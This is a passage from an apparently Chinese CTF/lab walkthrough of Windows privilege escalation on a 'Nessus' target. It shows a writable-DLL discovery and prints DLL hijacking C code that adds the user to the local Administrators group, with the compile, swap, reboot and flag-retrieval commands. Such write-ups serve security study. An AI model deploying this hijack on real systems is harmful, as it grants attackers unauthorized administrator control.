11204728 nasl.exe\n-a----          5\/9\/2024  11:31 PM         264824 ndbg.exe\n-a----          5\/9\/2024  11:06 PM             46 Nessus Web Client.url\n-a----          5\/9\/2024  11:33 PM          38520 nessus-service.exe\n-a----          5\/9\/2024  11:37 PM       11143800 nessuscli.exe\n-a----          5\/9\/2024  11:38 PM       11925624 nessusd.exe<\/code><\/pre>\n<p>\u53d1\u73b0\u5b58\u5728\u4e00\u4e9b<code>dll<\/code>\u6587\u4ef6\uff0c\u731c\u6d4b\u53ef\u80fd\u5b58\u5728\u52ab\u6301\u6f0f\u6d1e\uff0c\u770b\u4e00\u4e0b\u6743\u9650\uff1a<\/p>\n<pre><code class=\"language-bash\">*Evil-WinRM* PS C:\\Program Files\\Tenable\\Nessus&gt; icacls &quot;C:\\Program Files\\Tenable\\Nessus\\*&quot;\nC:\\Program Files\\Tenable\\Nessus\\.winperms NT AUTHORITY\\SYSTEM:(I)(F)\n                                          BUILTIN\\Administrators:(I)(F)\n                                          BUILTIN\\Users:(I)(RX)\n                                          NESSUS\\nesus:(I)(F)\n                                          APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                          APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\fips.dll NT AUTHORITY\\SYSTEM:(I)(F)\n                                         BUILTIN\\Administrators:(I)(F)\n                                         BUILTIN\\Users:(I)(RX)\n                                         NESSUS\\nesus:(I)(F)\n                                         APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                         APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\icudt73.dll NT AUTHORITY\\SYSTEM:(I)(F)\n                                            BUILTIN\\Administrators:(I)(F)\n                                            BUILTIN\\Users:(I)(RX)\n                                            NESSUS\\nesus:(I)(F)\n 
                                           APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                            APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\icuuc73.dll NT AUTHORITY\\SYSTEM:(I)(F)\n                                            BUILTIN\\Administrators:(I)(F)\n                                            BUILTIN\\Users:(I)(RX)\n                                            NESSUS\\nesus:(I)(F)\n                                            APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                            APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\legacy.dll NT AUTHORITY\\SYSTEM:(I)(F)\n                                           BUILTIN\\Administrators:(I)(F)\n                                           BUILTIN\\Users:(I)(RX)\n                                           NESSUS\\nesus:(I)(F)\n                                           APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                           APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\License.rtf NT AUTHORITY\\SYSTEM:(I)(F)\n                                            BUILTIN\\Administrators:(I)(F)\n                                            BUILTIN\\Users:(I)(RX)\n                                            NESSUS\\nesus:(I)(F)\n                                            APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                            APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\nasl.exe NT AUTHORITY\\SYSTEM:(I)(F)\n                                         BUILTIN\\Administrators:(I)(F)\n                                         BUILTIN\\Users:(I)(RX)\n          
                               NESSUS\\nesus:(I)(F)\n                                         APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                         APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\ndbg.exe NT AUTHORITY\\SYSTEM:(I)(F)\n                                         BUILTIN\\Administrators:(I)(F)\n                                         BUILTIN\\Users:(I)(RX)\n                                         NESSUS\\nesus:(I)(F)\n                                         APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                         APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\Nessus Web Client.url NT AUTHORITY\\SYSTEM:(I)(F)\n                                                      BUILTIN\\Administrators:(I)(F)\n                                                      BUILTIN\\Users:(I)(RX)\n                                                      NESSUS\\nesus:(I)(F)\n                                                      APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                                      APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\nessus-service.exe NT AUTHORITY\\SYSTEM:(I)(F)\n                                                   BUILTIN\\Administrators:(I)(F)\n                                                   BUILTIN\\Users:(I)(RX)\n                                                   NESSUS\\nesus:(I)(F)\n                                                   APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                                   APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\nessuscli.exe NT AUTHORITY\\SYSTEM:(I)(F)\n     
                                         BUILTIN\\Administrators:(I)(F)\n                                              BUILTIN\\Users:(I)(RX)\n                                              NESSUS\\nesus:(I)(F)\n                                              APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                              APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\nessusd.exe NT AUTHORITY\\SYSTEM:(I)(F)\n                                            BUILTIN\\Administrators:(I)(F)\n                                            BUILTIN\\Users:(I)(RX)\n                                            NESSUS\\nesus:(I)(F)\n                                            APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                            APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nSuccessfully processed 12 files; Failed processing 0 files<\/code><\/pre>\n<blockquote>\n<table>\n<thead>\n<tr>\n<th style=\"text-align: center;\"><strong>\u7b26\u53f7<\/strong><\/th>\n<th style=\"text-align: center;\"><strong>\u6743\u9650\u8bf4\u660e<\/strong><\/th>\n<th style=\"text-align: center;\"><strong>\u5bf9\u5e94\u64cd\u4f5c<\/strong><\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td style=\"text-align: center;\"><code>F<\/code><\/td>\n<td style=\"text-align: center;\">\u5b8c\u5168\u63a7\u5236<\/td>\n<td style=\"text-align: center;\">\u8bfb\u53d6\u3001\u5199\u5165\u3001\u6267\u884c\u3001\u5220\u9664\u3001\u4fee\u6539\u5c5e\u6027<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\"><code>M<\/code><\/td>\n<td style=\"text-align: center;\">\u4fee\u6539<\/td>\n<td style=\"text-align: center;\">\u8bfb\u53d6\u3001\u6267\u884c\u3001\u5199\u5165\u3001\u5220\u9664\uff08\u4e0d\u542b\u66f4\u6539\u6743\u9650\u548c\u53d6\u5f97\u6240\u6709\u6743\uff09<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\"><code>RX<\/code><\/td>\n<td style=\"text-align: 
 center;\">\u8bfb\u53d6\u548c\u6267\u884c<\/td>\n<td style=\"text-align: center;\">\u67e5\u770b\u5185\u5bb9\u3001\u8fd0\u884c\u7a0b\u5e8f<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\"><code>R<\/code><\/td>\n<td style=\"text-align: center;\">\u53ea\u8bfb<\/td>\n<td style=\"text-align: center;\">\u67e5\u770b\u5185\u5bb9<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\"><code>W<\/code><\/td>\n<td style=\"text-align: center;\">\u5199\u5165<\/td>\n<td style=\"text-align: center;\">\u4fee\u6539\u5185\u5bb9\uff08\u9700\u76ee\u5f55\u6743\u9650\uff09<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\"><code>D<\/code><\/td>\n<td style=\"text-align: center;\">\u5220\u9664<\/td>\n<td style=\"text-align: center;\">\u5220\u9664\u6587\u4ef6\u6216\u5b50\u76ee\u5f55<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><strong><code>F<\/code><\/strong>\uff1a\u5b8c\u5168\u63a7\u5236\uff08Full Control\uff09\uff1a \u5305\u542b\u6240\u6709\u6743\u9650\uff08\u8bfb\u53d6\u3001\u5199\u5165\u3001\u6267\u884c\u3001\u5220\u9664\u3001\u4fee\u6539\u5c5e\u6027\u7b49\uff09\uff0c\u53ef\u5b8c\u5168\u63a7\u5236\u6587\u4ef6\u6216\u76ee\u5f55\u3002<\/p>\n<\/blockquote>\n<p>\u5929\u5927\u7684\u597d\u6d88\u606f\uff0c\u5b8c\u5168\u6743\u9650\uff0c\u53ea\u8981\u77e5\u9053\u76ee\u6807\u8fd0\u7528\u4e86\u54ea\u4e2a<code>dll<\/code>\u5c31\u53ef\u4ee5\u5c1d\u8bd5\u8fdb\u884c\u52ab\u6301\u4e86\uff01\uff01\u8fd9\u91cc\u6211\u4e0a\u4f20\u4e86<code>Listdlls<\/code>\u5c1d\u8bd5\u4f7f\u7528<code>C:\\Users\\nesus\\desktop\\Listdlls.exe -accepteula<\/code>\u5217\u51fa\u4e86\u4e00\u4e9bdll\uff0c\u4f46\u662f\u6ca1\u5565\u7528\uff08\u666e\u901a\u7528\u6237\u4e00\u822c\u6253\u4e0d\u5f00\u4ee5 LocalSystem \u8fd0\u884c\u7684\u8fdb\u7a0b\uff0c\u679a\u4e3e\u4e0d\u5230\u5b83\u52a0\u8f7d\u7684\u6a21\u5757\uff09\uff0c\u8fd9\u91cc\u968f\u4fbf\u6311\u4e00\u4e2adll\u52ab\u6301\u4e00\u4e0b\u5427\uff0c\u4e0d\u884c\u5c31\u90fd\u5c1d\u8bd5\u52ab\u6301\uff0c\u53cd\u6b63\u54b1\u4eec\u90fd\u6709\u6743\u9650\uff01\u53e6\u5916 nesus \u5bf9<code>nessus-service.exe<\/code>\u672c\u8eab\u4e5f\u662f (F)\uff0c\u76f4\u63a5\u66ff\u6362\u670d\u52a1\u4e8c\u8fdb\u5236\u540c\u6837\u53ef\u884c\uff0c\u4e0d\u4e00\u5b9a\u975e\u8981\u731c dll\u3002<\/p>\n<h3>dll\u52ab\u6301<\/h3>\n<p>\u5728\u7f51\u4e0a\u627e\u4e86\u4e00\u4e2adll\u7684\u52ab\u6301\u811a\u672c\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<a href=\"https:\/\/cocomelonc.github.io\/pentest\/2021\/09\/24\/dll-hijacking-1.html\">https:\/\/cocomelonc.github.io\/pentest\/2021\/09\/24\/dll-hijacking-1.html<\/a><\/p>\n<p>\u4e5f\u53ef\u53c2\u8003\uff1a<a href=\"https:\/\/book.hacktricks.wiki\/en\/windows-hardening\/windows-local-privilege-escalation\/dll-hijacking\/index.html?highlight=windows%20dll#dll-search-order\">https:\/\/book.hacktricks.wiki\/en\/windows-hardening\/windows-local-privilege-escalation\/dll-hijacking\/index.html?highlight=windows%20dll#dll-search-order<\/a><\/p>\n<pre><code class=\"language-c\">\/*\nDLL hijacking example\nauthor: @cocomelonc\n*\/\n\n#include &lt;windows.h&gt;\n\nBOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call, LPVOID lpReserved) {\n    switch (ul_reason_for_call)  {\n    case DLL_PROCESS_ATTACH:\n      system(&quot;cmd.exe \/k net localgroup administrators nesus \/add&quot;);\n      break;\n    case DLL_PROCESS_DETACH:\n      break;\n    case DLL_THREAD_ATTACH:\n      break;\n    case DLL_THREAD_DETACH:\n      break;\n    }\n    return TRUE;\n}<\/code><\/pre>\n<p>\u6ce8\u610f\u811a\u672c\u91cc\u7528\u7684\u662f<code>cmd.exe \/k<\/code>\uff0c\u5b83\u6267\u884c\u5b8c<code>net localgroup<\/code>\u540e\u4e0d\u4f1a\u9000\u51fa\uff0c<code>system()<\/code>\u53ef\u80fd\u4f1a\u4e00\u76f4\u963b\u585e\u5728 DllMain \u91cc\u628a\u670d\u52a1\u542f\u52a8\u5361\u4f4f\uff08\u800c\u4e14\u5728\u52a0\u8f7d\u5668\u9501\u5185\u8c03\u7528<code>system()<\/code>\u672c\u8eab\u5c31\u4e0d\u7a33\u59a5\uff09\uff1b\u6539\u6210<code>cmd.exe \/c<\/code>\u8ba9\u547d\u4ee4\u8dd1\u5b8c\u5c31\u8fd4\u56de\u66f4\u5e72\u51c0\u3002\u8fdb\u884c\u7f16\u8bd1\uff0c\u518d\u4e0a\u4f20\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ x86_64-w64-mingw32-gcc exp.c -shared -o legacy.dll<\/code><\/pre>\n<p>\u8fd9\u91cc\u5fd8\u4e86\u8fdb\u884c\u5907\u4efd\u4e86\uff0c\u6240\u4ee5\u63a5\u4e0b\u6765\uff1a<\/p>\n<pre><code class=\"language-bash\">*Evil-WinRM* PS C:\\Program Files\\Tenable\\Nessus&gt; mv legacy.dll legacy_beifen.dll\n\nError: An error of type Errno::EHOSTUNREACH happened, message is No route to host - No route to host - connect(2) for &quot;192.168.10.105&quot; port 5985 (192.168.10.105:5985)\n\nError: Exiting with code 1\n\/usr\/bin\/evil-winrm: warning: Exception in finalizer #&lt;Proc:0x00007f63bad27b28 
\/usr\/share\/rubygems-integration\/all\/gems\/winrm-2.3.6\/lib\/winrm\/shells\/power_shell.rb:33&gt;\n\/usr\/lib\/ruby\/vendor_ruby\/logging\/diagnostic_context.rb:471:in `new&#039;: can&#039;t alloc thread (ThreadError)\n        from \/usr\/lib\/ruby\/vendor_ruby\/logging\/diagnostic_context.rb:471:in `create_with_logging_context&#039;\n        from \/usr\/lib\/ruby\/vendor_ruby\/logging\/diagnostic_context.rb:436:in `new&#039;\n        from \/usr\/lib\/ruby\/3.3.0\/timeout.rb:98:in `create_timeout_thread&#039;\n        from \/usr\/lib\/ruby\/3.3.0\/timeout.rb:131:in `block in ensure_timeout_thread_created&#039;\n        from \/usr\/lib\/ruby\/3.3.0\/timeout.rb:129:in `synchronize&#039;\n        from \/usr\/lib\/ruby\/3.3.0\/timeout.rb:129:in `ensure_timeout_thread_created&#039;\n        from \/usr\/lib\/ruby\/3.3.0\/timeout.rb:178:in `timeout&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/httpclient-2.8.3\/lib\/httpclient\/session.rb:748:in `connect&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/httpclient-2.8.3\/lib\/httpclient\/session.rb:511:in `query&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/httpclient-2.8.3\/lib\/httpclient\/session.rb:177:in `query&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/httpclient-2.8.3\/lib\/httpclient.rb:1246:in `do_get_block&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/httpclient-2.8.3\/lib\/httpclient.rb:1023:in `block in do_request&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/httpclient-2.8.3\/lib\/httpclient.rb:1137:in `protect_keep_alive_disconnected&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/httpclient-2.8.3\/lib\/httpclient.rb:1018:in `do_request&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/httpclient-2.8.3\/lib\/httpclient.rb:860:in `request&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/httpclient-2.8.3\/lib\/httpclient.rb:769:in 
`post&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/winrm-2.3.6\/lib\/winrm\/http\/transport.rb:176:in `send_request&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/winrm-2.3.6\/lib\/winrm\/shells\/power_shell.rb:42:in `close_shell&#039;\n        from \/usr\/share\/rubygems-integration\/all\/gems\/winrm-2.3.6\/lib\/winrm\/shells\/power_shell.rb:33:in `block in finalize&#039;<\/code><\/pre>\n<p>\u574f\u4e86\uff0c\u5e94\u8be5\u4e00\u8d77\u641e\u7684\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011614.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011614.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609235154559\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u767b\u5f55\u4e0d\u4e0a\u53bb\u4e86\u3002\u3002\u3002\u3002\u624d\u53d1\u73b0\u662f\u9776\u673a\u81ea\u5df1\u5173\u6389\u4e86\uff0c\u91cd\u542f\u4e00\u4e0b\uff0c\u53e6\u5916\u8bf4\u4e00\u53e5\u8fd9\u4e2a\u9776\u673a\u5df2\u7ecf\u81ea\u5df1\u5173\u597d\u51e0\u6b21\u4e86\u3002\u3002\u3002\u91cd\u542f\u8fde\u63a5\u4ee5\u540e\u91cd\u65b0\u6765\u4e00\u6b21\uff1a<\/p>\n<pre><code class=\"language-bash\">*Evil-WinRM* PS C:\\Users\\nesus\\Documents&gt; cd &quot;C:\\Program Files\\Tenable\\Nessus&quot;\n*Evil-WinRM* PS C:\\Program Files\\Tenable\\Nessus&gt; dir\n\n    Directory: C:\\Program Files\\Tenable\\Nessus\n\nMode                 LastWriteTime         Length Name\n----                 
-------------         ------ ----\n-a----        10\/18\/2024  10:35 AM              1 .winperms\n-a----          6\/9\/2025   8:48 AM          86510 exp.dll\n-a----          5\/9\/2024  11:30 PM        2471544 fips.dll\n-a----          5\/9\/2024  11:30 PM        5217912 icudt73.dll\n-a----          5\/9\/2024  11:30 PM        1575032 icuuc73.dll\n-a----          5\/9\/2024  11:30 PM        4988536 legacy.dll\n-a----          5\/9\/2024  11:06 PM         375266 License.rtf\n-a----          6\/9\/2025   8:21 AM         424096 Listdlls.exe\n-a----          5\/9\/2024  11:37 PM       11204728 nasl.exe\n-a----          5\/9\/2024  11:31 PM         264824 ndbg.exe\n-a----          5\/9\/2024  11:06 PM             46 Nessus Web Client.url\n-a----          5\/9\/2024  11:33 PM          38520 nessus-service.exe\n-a----          5\/9\/2024  11:37 PM       11143800 nessuscli.exe\n-a----          5\/9\/2024  11:38 PM       11925624 nessusd.exe\n\n*Evil-WinRM* PS C:\\Program Files\\Tenable\\Nessus&gt; whoami\nnessus\\nesus\n*Evil-WinRM* PS C:\\Program Files\\Tenable\\Nessus&gt; whoami \/all\n\nUSER INFORMATION\n----------------\n\nUser Name    SID\n============ ============================================\nnessus\\nesus S-1-5-21-2986980474-46765180-2505414164-1001\n\nGROUP INFORMATION\n-----------------\n\nGroup Name                             Type             SID          Attributes\n====================================== ================ ============ ==================================================\nEveryone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Remote Management Users        Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\NETWORK                   Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled 
group\nNT AUTHORITY\\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group\nMandatory Label\\Medium Mandatory Level Label            S-1-16-8192\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                Description                    State\n============================= ============================== =======\nSeChangeNotifyPrivilege       Bypass traverse checking       Enabled\nSeIncreaseWorkingSetPrivilege Increase a process working set Enabled\n\n*Evil-WinRM* PS C:\\Program Files\\Tenable\\Nessus&gt; mv legacy.dll legacy_beifen.dll; mv exp.dll legacy.dll<\/code><\/pre>\n<p>PrivescCheck \u91cc UserCanStart\/UserCanStop \u90fd\u662f False\uff0c\u5f53\u524d\u7528\u6237\u81ea\u5df1\u8d77\u4e0d\u4e86\u8fd9\u4e2a\u670d\u52a1\uff0c\u53ea\u80fd\u7b49\u5b83\u81ea\u884c\u91cd\u542f\u6216\u8005\u91cd\u542f\u9776\u673a\uff0c\u8ba9 Automatic \u542f\u52a8\u3001\u4ee5 LocalSystem \u8fd0\u884c\u7684\u670d\u52a1\u91cd\u65b0\u52a0\u8f7d dll\u3002\u56e0\u4e3a\u4e0d\u60f3\u7b49\u5f85\u4e86\uff0c\u5c1d\u8bd5\u91cd\u542f\u9776\u673a\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u6210\u529f\u4fee\u6539\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ evil-winrm -i $IP -u nesus -p password\n\nEvil-WinRM shell v3.7\n\nWarning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc&#039; for module Reline\n\nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\n\nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\nesus\\Documents&gt; cd &quot;C:\\Program Files\\Tenable\\Nessus&quot;\n*Evil-WinRM* PS C:\\Program Files\\Tenable\\Nessus&gt; dir\n\n    Directory: C:\\Program Files\\Tenable\\Nessus\n\nMode                 LastWriteTime         Length Name\n----                 -------------         ------ ----\n-a----   
     10\/18\/2024  10:35 AM              1 .winperms\n-a----          5\/9\/2024  11:30 PM        2471544 fips.dll\n-a----          5\/9\/2024  11:30 PM        5217912 icudt73.dll\n-a----          5\/9\/2024  11:30 PM        1575032 icuuc73.dll\n-a----          6\/9\/2025   8:48 AM          86510 legacy.dll\n-a----          5\/9\/2024  11:30 PM        4988536 legacy_beifen.dll\n-a----          5\/9\/2024  11:06 PM         375266 License.rtf\n-a----          6\/9\/2025   8:21 AM         424096 Listdlls.exe\n-a----          5\/9\/2024  11:37 PM       11204728 nasl.exe\n-a----          5\/9\/2024  11:31 PM         264824 ndbg.exe\n-a----          5\/9\/2024  11:06 PM             46 Nessus Web Client.url\n-a----          5\/9\/2024  11:33 PM          38520 nessus-service.exe\n-a----          5\/9\/2024  11:37 PM       11143800 nessuscli.exe\n-a----          5\/9\/2024  11:38 PM       11925624 nessusd.exe\n\n*Evil-WinRM* PS C:\\Program Files\\Tenable\\Nessus&gt; whoami \/all\n\nUSER INFORMATION\n----------------\n\nUser Name    SID\n============ ============================================\nnessus\\nesus S-1-5-21-2986980474-46765180-2505414164-1001\n\nGROUP INFORMATION\n-----------------\n\nGroup Name                                                    Type             SID          Attributes\n============================================================= ================ ============ ===============================================================\nEveryone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Remote Management Users                               Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Users                                                 Alias            S-1-5-32-545 
Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner\nNT AUTHORITY\\NETWORK                                          Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group\nMandatory Label\\High Mandatory Level                          Label            S-1-16-12288\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                            Description                                                        State\n========================================= ================================================================== =======\nSeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled\nSeSecurityPrivilege                       Manage auditing and security log                                   Enabled\nSeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled\nSeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled\nSeSystemProfilePrivilege                  Profile system performance                                         Enabled\nSeSystemtimePrivilege                     Change the system time                               
              Enabled\nSeProfileSingleProcessPrivilege           Profile single process                                             Enabled\nSeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled\nSeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled\nSeBackupPrivilege                         Back up files and directories                                      Enabled\nSeRestorePrivilege                        Restore files and directories                                      Enabled\nSeShutdownPrivilege                       Shut down the system                                               Enabled\nSeDebugPrivilege                          Debug programs                                                     Enabled\nSeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled\nSeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled\nSeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled\nSeUndockPrivilege                         Remove computer from docking station                               Enabled\nSeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled\nSeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled\nSeCreateGlobalPrivilege                   Create global objects                                              Enabled\nSeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled\nSeTimeZonePrivilege                       Change the time zone                                               Enabled\nSeCreateSymbolicLinkPrivilege             Create symbolic links                          
                    Enabled\nSeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled<\/code><\/pre>\n<p>\u770b\u6765\u662f\u6210\u529f\u4e86\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5\u62ff\u6389<code>rootflag<\/code>\u9a8c\u8bc1\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">*Evil-WinRM* PS C:\\Program Files\\Tenable\\Nessus&gt; cd c:\/users\/Administrator\n*Evil-WinRM* PS C:\\users\\Administrator&gt; cd desktop\n*Evil-WinRM* PS C:\\users\\Administrator\\desktop&gt; dir\n\n    Directory: C:\\users\\Administrator\\desktop\n\nMode                 LastWriteTime         Length Name\n----                 -------------         ------ ----\n-a----        10\/18\/2024  12:11 PM             70 root.txt\n\n*Evil-WinRM* PS C:\\users\\Administrator\\desktop&gt; type root.txt\nb5fc5a4ebfc20cc18220a814e1aee0aa<\/code><\/pre>\n<p>\u53ef\u4ee5\u6b63\u5e38\u62ff\u5230\uff0c\u8bf4\u660e\u5176\u5b9e\u5c31\u662f<code>administrator<\/code>\u7ec4\u6743\u9650\u7684<code>shell<\/code>\u4e86\uff01<\/p>\n<h2>\u5173\u4e8ecrackmapexec<\/h2>\n<p><code>NetExec<\/code>\u662f<code>CrackMapExec<\/code>\u7684\u73b0\u4ee3\u7ee7\u4efb\u8005\uff0c\u7531\u793e\u533a\u7ef4\u62a4\uff0c\u800c<code>CrackMapExec<\/code>\u4e4b\u524d\u7531<code>@byt3bl33d3r<\/code>\u521b\u5efa\uff0c\u540e\u6765\u7ef4\u62a4\u6743\u8f6c\u4ea4\uff0c\u4f46\u540e\u6765\u7ef4\u62a4\u8005\u9000\u4f11\u4e86\uff0c\u5bfc\u81f4\u9879\u76ee\u505c\u6ede\uff0c\u7136\u540e\u793e\u533a\u63a5\u624b\u6210\u4e3aNetExec\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ netexec smb $IP --loggedon-users -u nesus -p password\nSMB         192.168.10.100  445    NESSUS           [*] Windows Server 2022 Build 20348 x64 (name:NESSUS) (domain:Nessus) (signing:False) (SMBv1:False)\nSMB         192.168.10.100  445    NESSUS           [+] Nessus\\nesus:password \nSMB         192.168.10.100  445    NESSUS           
